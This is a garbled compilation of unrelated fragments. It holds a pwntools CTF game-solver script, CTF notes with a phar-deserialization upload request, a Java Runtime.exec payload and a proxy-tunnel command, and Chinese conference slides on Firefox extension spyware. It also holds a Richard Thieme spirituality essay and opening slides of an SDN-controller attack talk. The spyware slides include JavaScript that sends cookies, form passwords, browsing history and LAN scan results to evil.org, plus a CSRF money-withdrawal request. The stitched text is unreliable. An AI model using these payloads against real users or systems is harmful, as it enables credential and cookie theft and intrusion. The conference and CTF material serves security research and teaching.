for board in range(len(boards)):
p.recvuntil(f'board {board}: ')
res = p.recvline().decode()
if 'uncomplete' in res:
solved[board] = False
else:
solved[board] = True
for board in range(len(boards)):
if solved[board]:
continue
flag = True
for row in range(3):
for col in range(3):
if boards[board][row][col] == 0:
flag = False
if flag:
solved[board] = True
print(solved)
def check_solved1():
# global boards
global solved
for board in range(len(boards)):
if solved[board]:
continue
flag = True
for row in range(3):
for col in range(3):
if boards[board][row][col] == 0:
flag = False
if flag:
solved[board] = True
# print(solved)
unknown_conditions = [[1,2,4],[4,2,1],[1,3,9],[9,3,1],[2,4,8],[8,4,2],[4,6,9],[9,6,4]]
def judge():
global boards
global solved
global opp_choice
# Attack
# for board in range(len(boards)-1,-1,-1):
for board in [opp_choice]:
# if solved[board]:
# continue
# prevent draw here
# rest = 0
# for b in range(len(boards)):
# if not solved[b] and b != board:
# for row in range(3):
# for col in range(3):
# if boards[b][row][col] == 0:
# rest += 1
# if rest %2 == 1 and solved.count(False) > 1:
# continue
# Attack on row
for row in range(3):
if boards[board][row][0] and boards[board][row][1] and boards[board][row]
[2] == 0:
if 0 < boards[board][row][1] - (boards[board][row][0]-boards[board]
[row][1]) < 10:
return 1, board, row, 2, boards[board][row][1] - (boards[board]
[row][0]-boards[board][row][1])
for condition in unknown_conditions:
if boards[board][row][0] == condition[0] and boards[board][row][1]
== condition[1]:
return 1, board, row, 2, condition[2]
elif boards[board][row][0] and boards[board][row][2] and boards[board][row]
[1] == 0:
if (boards[board][row][2]-boards[board][row][0])%2==0:
return 1, board, row, 1, boards[board][row][0] - (boards[board]
[row][0]-boards[board][row][2]+1)//2
for condition in unknown_conditions:
if boards[board][row][0] == condition[0] and boards[board][row][2]
== condition[2]:
return 1, board, row, 1, condition[1]
elif boards[board][row][1] and boards[board][row][2] and boards[board][row]
[0] == 0:
if 0 < boards[board][row][1] - (boards[board][row][2]-boards[board]
[row][1]) < 10:
return 1, board, row, 0, boards[board][row][1] - (boards[board]
[row][2]-boards[board][row][1])
for condition in unknown_conditions:
if boards[board][row][1] == condition[1] and boards[board][row][2]
== condition[2]:
return 1, board, row, 0, condition[0]
# Attack on col
for col in range(3):
if boards[board][0][col] and boards[board][1][col] and boards[board][2]
[col] == 0:
if 0 < boards[board][1][col] - (boards[board][0][col]-boards[board][1]
[col]) < 10:
return 1, board, 2, col, boards[board][1][col] - (boards[board][0]
[col]-boards[board][1][col])
for condition in unknown_conditions:
if boards[board][0][col] == condition[0] and boards[board][1][col]
== condition[1]:
return 1, board, 2, col, condition[2]
elif boards[board][0][col] and boards[board][2][col] and boards[board][1]
[col] == 0:
if (boards[board][2][col]-boards[board][0][col])%2==0:
return 1, board, 1, col, boards[board][0][col] - (boards[board][0]
[col]-boards[board][2][col]+1)//2
for condition in unknown_conditions:
if boards[board][0][col] == condition[0] and boards[board][2][col]
== condition[2]:
return 1, board, 1, col, condition[1]
elif boards[board][1][col] and boards[board][2][col] and boards[board][0]
[col] == 0:
if 0 < boards[board][1][col] - (boards[board][2][col]-boards[board][1]
[col]) < 10:
return 1, board, 0, col, boards[board][1][col] - (boards[board][2]
[col]-boards[board][1][col])
for condition in unknown_conditions:
if boards[board][2][col] == condition[2] and boards[board][1][col]
== condition[1]:
return 1, board, 0, col, condition[0]
# Defend
# for board in range(len(boards)):
for board in [opp_choice]:
if solved[board]:
continue
for row in range(3):
for col in range(3):
if boards[board][row][col]:
continue
available = set(range(1,10))
if col == 0 and boards[board][row][2]==0 and boards[board][row][1]:
needRemove = set()
for val in available:
if 0 < boards[board][row][1] - (val-boards[board][row][1]) <
10:
# print(f"Removing {val} due to rule 1")
needRemove.add(val)
for condition in unknown_conditions:
if boards[board][row][1] == condition[1]:
needRemove.add(condition[0])
available -= needRemove
elif col == 0 and boards[board][row][1]==0 and boards[board][row][2]:
needRemove = set()
for val in available:
if (boards[board][row][2]-val)%2==0:
# print(f"Removing {val} due to rule 2")
needRemove.add(val)
for condition in unknown_conditions:
if boards[board][row][2] == condition[2]:
needRemove.add(condition[0])
available -= needRemove
elif col == 1 and boards[board][row][0]==0 and boards[board][row][2]:
needRemove = set()
for val in available:
if 0 < val - (boards[board][row][2]-val) < 10:
# print(f"Removing {val} due to rule 3")
needRemove.add(val)
for condition in unknown_conditions:
if boards[board][row][2] == condition[2]:
needRemove.add(condition[1])
available -= needRemove
elif col == 1 and boards[board][row][2]==0 and boards[board][row][0]:
needRemove = set()
for val in available:
if 0 < val - (boards[board][row][0]-val) < 10:
# print(f"Removing {val} due to rule 4")
needRemove.add(val)
for condition in unknown_conditions:
if boards[board][row][0] == condition[0]:
needRemove.add(condition[1])
available -= needRemove
elif col == 2 and boards[board][row][0]==0 and boards[board][row][1]:
needRemove = set()
for val in available:
if 0 < boards[board][row][1] - (val-boards[board][row][1]) <
10:
# print(f"Removing {val} due to rule 5")
needRemove.add(val)
for condition in unknown_conditions:
if boards[board][row][1] == condition[1]:
needRemove.add(condition[2])
available -= needRemove
elif col == 2 and boards[board][row][1]==0 and boards[board][row][0]:
needRemove = set()
for val in available:
if (val-boards[board][row][0])%2==0:
# print(f"Removing {val} due to rule 6")
needRemove.add(val)
for condition in unknown_conditions:
if boards[board][row][0] == condition[0]:
needRemove.add(condition[2])
available -= needRemove
if row == 0 and boards[board][2][col]==0 and boards[board][1][col]:
needRemove = set()
for val in available:
if 0 < boards[board][1][col] - (val-boards[board][1][col]) <
10:
# print(f"Removing {val} due to rule 7")
needRemove.add(val)
for condition in unknown_conditions:
if boards[board][1][col] == condition[1]:
needRemove.add(condition[0])
available -= needRemove
elif row == 0 and boards[board][1][col]==0 and boards[board][2][col]:
needRemove = set()
for val in available:
if (boards[board][2][col]-val)%2==0:
# print(f"Removing {val} due to rule 8")
needRemove.add(val)
for condition in unknown_conditions:
if boards[board][2][col] == condition[2]:
needRemove.add(condition[0])
available -= needRemove
elif row == 1 and boards[board][0][col]==0 and boards[board][2][col]:
needRemove = set()
for val in available:
if 0 < val - (boards[board][2][col]-val) < 10:
# print(f"Removing {val} due to rule 9")
needRemove.add(val)
for condition in unknown_conditions:
if boards[board][2][col] == condition[2]:
needRemove.add(condition[1])
available -= needRemove
elif row == 1 and boards[board][2][col]==0 and boards[board][0][col]:
needRemove = set()
for val in available:
if 0 < val - (boards[board][0][col]-val) < 10:
# print(f"Removing {val} due to rule 10")
needRemove.add(val)
for condition in unknown_conditions:
if boards[board][0][col] == condition[0]:
needRemove.add(condition[1])
available -= needRemove
elif row == 2 and boards[board][0][col]==0 and boards[board][1][col]:
needRemove = set()
for val in available:
if 0 < boards[board][1][col] - (val-boards[board][1][col]) <
10:
# print(f"Removing {val} due to rule 11")
needRemove.add(val)
for condition in unknown_conditions:
if boards[board][1][col] == condition[1]:
needRemove.add(condition[2])
available -= needRemove
elif row == 2 and boards[board][1][col]==0 and boards[board][0][col]:
needRemove = set()
for val in available:
if (val-boards[board][0][col])%2==0:
# print(f"Removing {val} due to rule 12")
needRemove.add(val)
for condition in unknown_conditions:
if boards[board][0][col] == condition[0]:
needRemove.add(condition[2])
available -= needRemove
if boards[board][row][0] and boards[board][row][1] and col == 2:
needRemove = set()
if 0 < boards[board][row][1] - (boards[board][row][0]-boards[board]
[row][1]) < 10:
needRemove.add(boards[board][row][1] - (boards[board][row][0]-
boards[board][row][1]))
for condition in unknown_conditions:
if boards[board][row][0] == condition[0] and boards[board][row]
[1] == condition[1]:
needRemove.add(condition[2])
available -= needRemove
elif boards[board][row][0] and boards[board][row][2] and col == 1:
needRemove = set()
if (boards[board][row][2]-boards[board][row][0])%2==0:
needRemove.add(boards[board][row][0] - (boards[board][row][0]-
boards[board][row][2]+1)//2)
for condition in unknown_conditions:
if boards[board][row][0] == condition[0] and boards[board][row]
[2] == condition[2]:
needRemove.add(condition[1])
available -= needRemove
elif boards[board][row][1] and boards[board][row][2] and col == 0:
needRemove = set()
if 0 < boards[board][row][1] - (boards[board][row][2]-boards[board]
[row][1]) < 10:
needRemove.add(boards[board][row][1] - (boards[board][row][2]-
boards[board][row][1]))
for condition in unknown_conditions:
if boards[board][row][1] == condition[1] and boards[board][row]
[2] == condition[2]:
needRemove.add(condition[0])
available -= needRemove
if boards[board][0][col] and boards[board][1][col] and row == 2:
needRemove = set()
if 0 < boards[board][1][col] - (boards[board][0][col]-boards[board]
[1][col]) < 10:
needRemove.add(boards[board][1][col] - (boards[board][0][col]-
boards[board][1][col]))
for condition in unknown_conditions:
if boards[board][0][col] == condition[0] and boards[board][1]
[col] == condition[1]:
needRemove.add(condition[2])
available -= needRemove
elif boards[board][0][col] and boards[board][2][col] and row == 1:
needRemove = set()
if (boards[board][2][col]-boards[board][0][col])%2==0:
needRemove.add(boards[board][0][col] - (boards[board][0][col]-
boards[board][2][col]+1)//2)
for condition in unknown_conditions:
if boards[board][0][col] == condition[0] and boards[board][2]
[col] == condition[2]:
needRemove.add(condition[1])
available -= needRemove
elif boards[board][1][col] and boards[board][2][col] and row == 0:
needRemove = set()
if 0 < boards[board][1][col] - (boards[board][2][col]-boards[board]
[1][col]) < 10:
needRemove.add(boards[board][1][col] - (boards[board][2][col]-
boards[board][1][col]))
for condition in unknown_conditions:
if boards[board][2][col] == condition[2] and boards[board][1]
[col] == condition[1]:
needRemove.add(condition[0])
available -= needRemove
if available:
print(row,col,available)
return 0, board, row, col, random.choice(list(available))
# Failed to defense...
# for board in range(len(boards)):
for board in [opp_choice]:
if solved[board]:
continue
for row in range(3):
for col in range(3):
if boards[board][row][col] == 0:
return 2, board, row, col, 1
opp_choice = 0
context.log_level = 'debug'
for _ in range(1):
p = remote("10.10.10.103", 3000)
p.sendlineafter('verbose? (y/n)', 'y')
numBoards = [1,3,9,13]
level = 0
boards = [[[0]*3 for row in range(3)] for board in range(numBoards[level])]
solved = [False for board in range(numBoards[level])]
print(boards)
move(0,1,1,5)
while not all(solved):
get_move()
check_solved()
if all(solved):
break
print(boards)
attack, board, x,y,val = judge()
if attack == 1:
print('Attack!')
solved[board] = True
elif attack == 0:
print('Defend!')
elif attack == 2:
print('WTF, failed to defense...')
print('my:',board, x, y, val)
move(board, x, y, val)
status = p.recvuntil('game').decode()
if 'lose' in status:
p.close()
continue
level = 1
boards = [[[0]*3 for row in range(3)] for board in range(numBoards[level])]
solved = [False for board in range(numBoards[level])]
for board in range(numBoards[level]):
p.recvuntil('uncomplete')
p.recvline()
a,b,c = map(int,p.recvline().strip().decode())
boards[board][0][0] = a
boards[board][0][1] = b
boards[board][0][2] = c
a,b,c = map(int,p.recvline().strip().decode())
boards[board][1][0] = a
boards[board][1][1] = b
boards[board][1][2] = c
a,b,c = map(int,p.recvline().strip().decode())
boards[board][2][0] = a
boards[board][2][1] = b
boards[board][2][2] = c
print(boards)
move(0,1,1,5)
while not all(solved):
get_move()
check_solved()
if all(solved):
break
print(boards)
attack, board, x,y,val = judge()
if attack == 1:
print('Attack!')
solved[board] = True
elif attack == 0:
print('Defend!')
elif attack == 2:
print('WTF, failed to defense...')
print('my:',board, x, y, val)
move(board, x, y, val)
status = p.recvuntil('game').decode()
if 'lose' in status:
p.close()
continue
level = 2
boards = [[[0]*3 for row in range(3)] for board in range(numBoards[level])]
solved = [False for board in range(numBoards[level])]
for board in range(numBoards[level]):
p.recvuntil('uncomplete')
p.recvline()
a,b,c = map(int,p.recvline().strip().decode())
boards[board][0][0] = a
boards[board][0][1] = b
boards[board][0][2] = c
a,b,c = map(int,p.recvline().strip().decode())
boards[board][1][0] = a
boards[board][1][1] = b
boards[board][1][2] = c
a,b,c = map(int,p.recvline().strip().decode())
boards[board][2][0] = a
boards[board][2][1] = b
boards[board][2][2] = c
print(boards)
move(0,1,1,5)
while not all(solved):
# while solved.count(False) > 1:
print(solved)
get_move()
check_solved()
if all(solved):
break
print(boards)
attack, board, x,y,val = judge()
if attack == 1:
print('Attack!')
solved[board] = True
elif attack == 0:
print('Defend!')
elif attack == 2:
print('WTF, failed to defense...')
print('my:',board, x, y, val)
move(board, x, y, val)
status = p.recvuntil('game').decode()
if 'lose' in status:
p.close()
continue
level = 3
boards = [[[0]*3 for row in range(3)] for board in range(numBoards[level])]
solved = [False for board in range(numBoards[level])]
for board in range(numBoards[level]):
p.recvuntil('uncomplete')
p.recvline()
a,b,c = map(int,p.recvline().strip().decode())
boards[board][0][0] = a
boards[board][0][1] = b
babydebug
!cat flag
easycms
boards[board][0][2] = c
a,b,c = map(int,p.recvline().strip().decode())
boards[board][1][0] = a
boards[board][1][1] = b
boards[board][1][2] = c
a,b,c = map(int,p.recvline().strip().decode())
boards[board][2][0] = a
boards[board][2][1] = b
boards[board][2][2] = c
print(boards)
move(0,1,1,5)
while not all(solved):
# while solved.count(False) > 1:
print(solved)
get_move()
check_solved()
if all(solved):
break
print(boards)
attack, board, x,y,val = judge()
if attack == 1:
print('Attack!')
solved[board] = True
elif attack == 0:
print('Defend!')
elif attack == 2:
print('WTF, failed to defense...')
print('my:',board, x, y, val)
move(board, x, y, val)
status = p.recvuntil('game').decode()
if 'lose' in status:
p.close()
continue
p.interactive()
api
POST /index.php?s=/api/Base/upload HTTP/1.1
Host: 172.35.13.101:31337
Pragma: no-cache
Cache-Control: no-cache
tp6popphar
spider
JS
payload
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/91.0.4472.77 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,
*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=69fbea77e5f61e0fbabb45fdd786e5ee
authorization:
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJjbGllbnQueGhhZG1pbiIsImF1ZCI6InNlcnZlci
54aGFkbWluIiwiaWF0IjoxNjIyMzQxNjYzLCJleHAiOjEwMDAwMTYyMjM0MTY2MiwidWlkIjoxfQ.e5fhbPtljQ
C5te8X-KIwxMG9kCtZU1c_cOgLVerJYpk
Connection: close
Content-Type: multipart/form-data; boundary=--------1625044263
Content-Length: 566
----------1625044263
Content-Disposition: form-data; name="upfile";
filename="652e043ee9f20635d0b3f2ea1085f0819.png"
Content-Type: application/zip
1
----------1625044263--
<http://172.35.13.101:31337/index.php?
s=/api/Base/checkFileExists&filepath=phar:///var/www/html/public/uploads/api/202105/60b
37c793f521.png>
var JavaTest= Java.type("java.lang"+".Runtime");
var b =JavaTest.getRuntime();
b.exec("ls /");
throw b;
return "a";
}
coturn
turner
https://github.com/staaldraad/turner.gitgolang
proxychains ip http://192.168.0.23
minus(1);
function ddadf()
{
sudo ./turner -server 10.10.10.102:8000 -socks5 | pdf |
Firefox Extension Spyware
ant
Hacks in Taiwan Conference 2008
Outline
1. 不安全的 Firefox extension
2. Firefox extension spyware
3. Firefox 3 準備好了嗎?
不安全的 Firefox extension
● FormSpy
● 著名的 Firefox extension spyware
● 2006/07 發現
● 偽裝成合法的 NumberedLinks 0.9
● 竊取信用卡卡號、密碼、網路銀行 PIN 碼、
以及 ICQ, FTP, IMAP, POP3 的密碼。
● FFsniFF
● 於 extensions list 中隱藏自身
● 自動化將 Form( 表單 ) 內容經由 SMTP 傳遞
● 2006/12 支援 Firefox2; 2008/06 支援 Firefox3
● Sage
● RSS Reader
● 2006/09, Cross-Zone Scripting
● Firebug
● Javascript debugger
● 2007/04, Cross-Zone Scripting
XPCOM
跨平台的安全性問題
(Windows, Linux, BSD, Mac OS)
Firefox extension spyware
1. 釣魚網頁
2. 內部網路掃描
3. 追蹤瀏覽紀錄
4. 竊取 cookie
5. 自動化 CSRF 攻擊
6. FormSpy
7. ReadFile
8. Run Remote App/File
1. 釣魚網頁
Yahoo! 奇摩登錄網頁
Yahoo! 奇摩釣魚網頁
Demo
<HTML>
....
<a href=foo>foo</a>
<a href=yahoo_login> 登入 </a>
<a href=bar>bar</a>
....
</HTML>
2. 內部網路掃描
● 繞過防火牆
● 探巡 Private IP Address
● 取得內部 IP
● 得知內網伺服器 IP 及伺服器資訊
● … 等
SSH
NetBIOS
FTP
HTTP
1
2
SSH
NetBIOS
FTP
HTTP
1
3
2
Demo #1
IP range
Scanning
Send
38 status = "";
39 function callback(target, port, status) {
40 new Image().src=
"http://evil.org/evil/scanLAN.php?
target="+target+"&port="+port+"&status="+status;
41 };
42
43 var AttackAPI = {
44 version: '0.1',
45 author: 'Petko Petkov (architect)',
46 homepage: 'http://www.gnucitizen.org',
47 modifyBy: 'Yi-Feng Tzeng'
48 };
New Image( )
Host down
Port closed
Host : Port
Host up
Port open
error
timeout
49 AttackAPI.PortScanner = {};
50 AttackAPI.PortScanner.scanPort = function (callback, target, port, timeout) {
51 var timeout = (timeout == null)?2000:timeout;
52
53 var img = new Image();
54
55 img.onerror = function () {
56 if (!img) return;
57 img = undefined;
58 callback(target, port, 'open');
59 };
60
61 img.onload = img.onerror;
62 img.src = 'http://' + target + ':' + port;
63
64 setTimeout(function () {
65 if (!img) return;
66 img = undefined;
67 callback(target, port, 'closed');
68 }, timeout);
69 };
70 AttackAPI.PortScanner.scanTarget = function (callback, target, ports, timeout)
71 {
72 for (p = 1; p < target.length; p++)
73 {
74 for (index = 0; index < ports.length; index++)
75 AttackAPI.PortScanner.scanPort(callback, target[p], ports[index], timeout);
76 }
77 };
78
79 AttackAPI.PortScanner.scanTarget(callback, arrAddr, port.split(','), 2000);
受到限制
1. 必須安裝 Java (JRE)
2. 沒有暫存掃描紀錄
3. 無法處理 timeout 問題
network.http.max-connections
network.http.keep-alive.timeout
max-connections
new Image
If full ; IDLE
timout
DROP
Firefox 2
network.http.max-connections: 24
network.http.keep-alive.timeout: 300
Firefox 3
network.http.max-connections: 30
network.http.keep-alive.timeout: 300
掃描過多會遲頓
Blind IP guess
Scanning
Send
Save
guessLAN = ["192.168.0.", "192.168.1.", "10.0.0.", "10.0.1.", "169.254.132."];
pref('extensions.resize.guess', true);
pref('extensions.resize.LAN', '192.168.0.');
pref('extensions.resize.scanLAN', '192.168.0.0');
pref('extensions.resize.lastRun', '');
Demo #2
Signatures
Apache /icons/apache_pb.gif
Apache2 /icons/apache_pb2.gif (apache_pb22.gif)
EPSON Printer EpsonNet_logo.gif
HP Printer /hp/device/images/hp_invent_logo.gif
IIS 4.0/5.0 iis4_5.gif
IIS 5.0/5.1/6.0 iis51_6.gif
SunOne WebServer sun.gif
Cisco HTTP cisco.gif
LinKsys linksys.gif
TightVNC vnc.gif
WebLogic Server 8.x bea.gif
thttpd thttpd.gif
New Image( )
Host down
Port closed
Host : Port
Host up
Port open
error
timeout
Signatures
3. 追蹤瀏覽紀錄
● 凡走過,必留下痕跡
HTTP
HTTP (link)
1
2
Demo
16 // Get Time
17 var currentTime = new Date();
18 var year = currentTime.getFullYear();
19 var month = currentTime.getMonth() + 1;
20 var day = currentTime.getDate();
21 var hour = currentTime.getHours();
22 var min = currentTime.getMinutes();
23 var sec = currentTime.getSeconds();
24 var time = year+"-"+month+"-"+day+":"+hour+":"+min+":"+sec;
25
26 new Image().src=
"http://evil.org/evil/historyspy.php?
time="+time+
"&link="+document.location.href+
"&port="+((!document.location.port)?80:document.location.port);
4. 竊取 cookie
● Face Off : 你是我,我是你
HTTP (cookie)
1
2 HTTP (cookie)
Bob
ant
I'm
Bob
Hello
Bob
3
4
Demo
16 // Get Time
17 var currentTime = new Date();
18 var year = currentTime.getFullYear();
19 var month = currentTime.getMonth() + 1;
20 var day = currentTime.getDate();
21 var hour = currentTime.getHours();
22 var min = currentTime.getMinutes();
23 var sec = currentTime.getSeconds();
24 var time = year+"-"+month+"-"+day+":"+hour+":"+min+":"+sec;
25
26 new Image().src=
"http://evil.org/evil/steal.php?
time="+time+
"&link="+document.location.href+
"&port="+((!document.location.port)?80:document.location.port)+
"&cookie="+document.cookie;
5. 自動化 CSRF 攻擊
● 自動化轉帳?
HTTP
1
2 HTTP:GET (cookie)
Demo #1
new Image().src=
"http://victim.org/withdraw.php?for=000100&amount=100;
POST
Referer
Double Cookie
Random Tokens
HTTP (cookie)
HTTP
1
2
3
CSRF
Demo #2
new Image().src=
"http://evil.org/evil/csrf.php?cookie="+document.cookie+"&time="+time;
6. FormSpy
● 你提交的內容,也請送我一份
Yahoo! 奇摩登錄網頁
HTTP (submit)
HTTP
1
4
2 HTTP
3 HTTP (submit)
Demo
<HTML>
....
<FORM>
....
<input type=text ....>
<input type=password ....>
....
</FORM>
....
</HTML>
48 if (gotPasswd == 1)
49 {
50 new Image().src=
"http://evil.org/evil/formspy.php?time="+time+
"&link="+document.location.href+
"&port="+((!document.location.port)?80:document.location.port)+
"&data="+data;
51 }
追蹤
瀏覽紀錄
FormSpy
自動化
CSRF
竊取
cookie
7. ReadFile
● 秀一下你的檔案好嗎?
HTTP
1
2
Read
Demo
8. Run Remote App/File
● Drive-by download
HTTP
2
1
Run
Demo
內部網路掃描
A
Extension 更新
B
下載惡意程式
C
內部網路入侵
D
散佈?
Firefox 懶人包
( 內附 spyware )
( 隱藏 spyware )
偽裝、中文化、相容版、功能強化
( 論壇式散佈 )
( 5 天後隱藏 )
偽裝實例
resizeable textarea
(phishing)
Dashboard
(zombie)
Gmail 實例
HTTP (cookie)
1
2 HTTP (cookie)
3 HTTP (cookie)
Firefox 3 準備好了嗎?
● Firefox 3 限制了部分 extension 能力
● 禁斷 document.write
● 呼叫外部函式 eg: new java.net.Socket()
● etc.
● 但是對上述攻擊保護了多少?
● NoScript ?
● HTTP-only cookies ? (Firefox3)
● Firefox 4 ?
Greasemonkey Script ?
知
己
知
彼
百
戰
不
殆
孫
子
。
謀
攻
篇 | pdf |
The Second Edition:
Remembering Who We Are
by Richard Thieme
Most of us live a large part of our lives skating on the ice of trivial essentials, the
necessary tasks that fill our waking days. We pause from time to time and look at the
etched images in the ice and think, this is the pattern of our lives, these images reveal our
character and choices.
But more, much more, is going on.
Occasionally, the ice thins, heeding a midwinter springtime we don’t know how to
define, a season hidden inside us, a season determined by a different sun. That sun knows
what we need and when we need it. Our readiness is all.
The ice cracks and we fall into darkness that explodes paradoxically with light, we are
saturated, immersed in the root sources of meaning. We know in those moments what
matters, what is real.
The contents of ordinary days quickly return and fill our waking state, the meaning of
those moments almost but not quite forgotten. But we never really forget. And next time
it happens, we recognize the experience for what it is. We link those moments into a
different, more fundamental pattern, we say to ourselves, yes. I know this place. I have
been here before.
We remember who we really are.
A few years ago, a long friendship with another couple kind of played itself out. It drifted
for a year or two toward an end with a whimper, not a bang, as relationships often do. We
had taken different paths, with divergent interests, values, and choices, and moved apart.
After a while, there wasn’t much point in getting together anymore.
That was acceptable. We knew that people grow and change. It happens.
Our lives, filled with those trivial essentials, moved on.
Then, a few weeks ago, seemingly out of nowhere, I felt intense waves of energy that
surged or swept up in me or into me – the metaphors don’t really enlighten, they merely
point toward things we don’t know how to explain – strong palpable waves associated
with the name of the woman. As they came, I knew it had something to do with her but
not what or why. I would be working out at the gym or driving or watching snow fall
onto the trees through my office window, doing something else as it were with the other
parts of my mind, when from around back at the edges, it felt like, her name and those
waves of energy seized my attention.
That used to happen with regularity when I was in the professional ministry because, I
think, I was linked to so many people with an intention to be open. Oh I know, I know,
when we call someone and ask how they are and they say they were thinking of us too or
something important is going on, it’s easy to say it’s nothing but coincidence.
But other times, calling it a coincidence is a bit of a stretch.
I think of the time I had been visiting the mother of a member of the parish who was in a
nursing home, seriously ill. I would stop by in the morning and then go on with the rest of
the day. One day, however, although I had been there for my morning visit, as I returned
to the office from lunch, one of those waves came. I was in the left hand lane of a wide
Salt Lake City street, ready to turn left onto Highland Drive and return to the church,
when it flashed through me and I thought, no, I had better get back there now. I crossed
several lanes - Brigham Young wanted Salt Lake City streets to be wide enough to u-turn
a team of oxen, remember – and turned right instead and returned to the nursing home.
As I pulled up to the door, the parishioner was on the curb.
“How did they find you so fast?” she said.
I shook my head. “What do you mean?”
“Mother just died, I just ran to the office and told them to call you.”
Some said I had picked up subliminal clues that the mother was about to die and
calibrated my anomalous return to what I knew unconsciously. That “rational”
explanation begs more questions than the obvious one, that I got the call and responded.
Spirituality, I was discovering in those years, meant not that some had “special gifts” but
that it was human to be this way, that spiritual discipline meant learning to listen and not
shut it out because one might be embarrassed to act on an impulse without knowing why.
The imperative was not knowing but knowing that you knew, then acting, even if you
didn’t know what you knew or how.
I learned to honor the experience by at least making a telephone call and saying, hi,
what's going on? That’s what I might have done twenty years earlier as a matter of
professional habit. But this time, I did not want to reestablish a connection or reawaken
the relationship. It was better, I told myself, to let it go, despite successive waves of
feeling that always came with the name of my long-ago friend.
So I didn’t respond. I rode them out, let them subside, and resisted the call.
Last week my wife said, “Look at this.” She handed me an obituary for the mother of my
friend. She had been in the last stages of dying when the waves began. We went to the
funeral, saw our friends again, and expressed condolences. That might have been the end
of it, but the following Sunday, remembering that my friend and her husband had had
dinner every Sunday night with her mother and that this was the first Sunday without her,
I telephoned and suggested that we have dinner. As it happened, no one else had thought
of that connection and they would have been alone. So the four of us went to a favorite
restaurant and talked for hours.
We were friends again, we realized, or still. But that’s not the point. This is the point:
I told her what I had felt and when and how and she said it began when her mother sank
toward certain death. The waves of deep feeling were indeed a distress call, non-
localized, consciousness to consciousness, however that happens. It’s like entanglement,
we say, spooky action at a distance, Einstein called it, but that doesn’t explain anything.
I said as we both shed a few tears of shared grief that I had betrayed my calling, not as a
former clergyman but as a human being, a spiritual being, by resisting the call and
refusing to honor the fact of our connection.
I have often said that professional ministry is a training program for those like myself
who seem to need it to become more fully human. We enter the profession not because
we need the training less but because we need it more. And it works, the ministry as a
training program works, because you can’t do that work effectively without learning each
time a person brings you the truth of their lives and teaches you how resilient, elastic,
even heroic humans are, not as an add-on but intrinsically. It is axiomatic to our humanity
to transcend whatever life brings.
Once you know that, not once you read about it, think it, or recite it in a ritual, but
KNOW that we are all connected, not metaphorically but in fact, that we really are all
part of one another and of something bigger than we are, call it the universe, call it a
body, call it whatever you like, once we know that we are cells in a body that may well
grow to fill the galaxies and all of spacetime with its expansive meta-self, then it is
axiomatic to know too that we belong to one another, that the well being of the other is as
critical to me as my own, and to care for the other as for myself is an imperative – not as
a duty, but as a concomitant aspect of knowing that to do this is what it means to be
human.
As notions go, this is not new. But it is makes a difference to "get" it and not just think it
with the left-side part of the brain that thinks it knows everything and that what I am
saying here is foolishness and rant.
Mechanical engineering is not the end of life, after all.
I realized that I had chosen, contrary to what I knew but forgot, to push away what I felt
and not act, and that was a betrayal, a betrayal of the real, a betrayal of the non-trivial
sources of meaning and love.
I told her at that dinner that I had failed to honor that ineluctable fact of correlated
relationship. It is not what is related but relationship itself that structures the universe.
The angle of inclination is an imperative I had disregarded.
She cried and we hugged and she said, in that moment, it was honored.
Our readiness is all.
We can not unlearn what we have learned but we can neglect to remember it. We are
cells in a single body, a single trans-person as it were, human and non-human alike,
knitted into a being that extends to the edges of spacetime, infolded into a single
mysterious vital beating heart.
Our sins, then, are often sins of forgetting, omission or neglect. When we remember who
we are, when the quotidian vanishes in a flash, we act in accordance with fact. And when
we do, the stars and planets and galaxies, the pattern or the form of the universe that
angles us into complementary beings of wonder, with countenance and form and purpose
beyond our grasp ... we sing in a single thousand-part harmony, a chorus of myriad
voices sounding one might guess like a shout.
The Second Edition is a periodic reflection by author and speaker
Richard Thieme. Subscribe (or unsubscribe) by clicking below or writing to
[email protected] and stating subscribe (or unsubscribe).
Richard Thieme (www.thiemeworks.com) speaks and writes about the issues
of our times, with an emphasis on the impact of various technologies on the structures of
our lives, creativity in work and life, and how to reinvent ourselves in response to
challenges – all aspects of “enlightened practical spirituality.” If interested in
having him speak to your organization, email [email protected]. | pdf |
Customize Evil Protocol to Pwn an SDN Controller
HACKING THE BRAIN
Feng Xiao, Ph.D. student at PennState, Cyber Security Lab
Jianwei Huang, Researcher at Wuhan University
Peng Liu, Professor at PennState, Cyber Security Lab
What’s SDN?
func
Virtual
Switch
func
func
Control
Plane
Data
Plane
Software-Defined Networking (SDN) is an emerging architecture that
decouples the network control and forwarding functions.
What’s SDN Like Today?
Who are using?
• More than 15 popular controllers.
• More than 3000 open source SDN projects.
Who are contributing?
• Data Center
• IDC
• Telecom
• …
Overview of SDN Attacks
Attack on Control Plane
• Topology tampering
• Control channel flooding
Attack on Data Plane
• Switch OS Hacking
• TCAM Flooding
Controller
APP
N
E
T
C
O
N
F
Control
Plane
APP
APP
O
P
E
N
F
L
O
W
O
V
S
D
B
Data
Plane
Pwn It Like A Hacker?
Software-Defined Networks
Decoupled Control Plane and Data Plane
Firewall
Load-
Balancing
Controller
OpenFlow
OVSDB
Control Channel
…
…
Switch
Host
Infrastructure
…
Pwn It Like A Hacker?
Software-Defined Networks
Decoupled Control Plane and Data Plane
Our Choice:
Custom Attack
Firewall
Load-
Balancing
Controller
OpenFlow
OVSDB
Control Channel
…
…
Switch
Host
Infrastructure
…
Custom Attack
Custom Protocol Field (CPF) in
legitimate protocol interactions
•CPF is controlled by data plane
•CPF will be processed by components
in the controller
Infrastructure
Service
APP
L
I
B
R
A
R
I
E
S
Controller
Custom Attack
Custom Protocol Field (CPF) in
legitimate protocol interactions
•CPF is controlled by data plane
•CPF will be processed by components
in the controller
Infrastructure
Service
APP
L
I
B
R
A
R
I
E
S
③
⑥
Controller
CPF results in a semantic gap between
control plane and data plane
What Can It Cause?
Execute Arbitray SDN Commands
Steal Confidential Data
Crash/Disrupt Service
Disable Network Function
...
Threat Model
We do NOT assume that hackers can have network access
to SDN controllers or SDN applications
Control channel is well protected by SSL/TLS
Threat Model
We do NOT assume that hackers can have network access
to SDN controllers or SDN applications
Control channel is well protected by SSL/TLS
A compromised host[1] or switch[2]
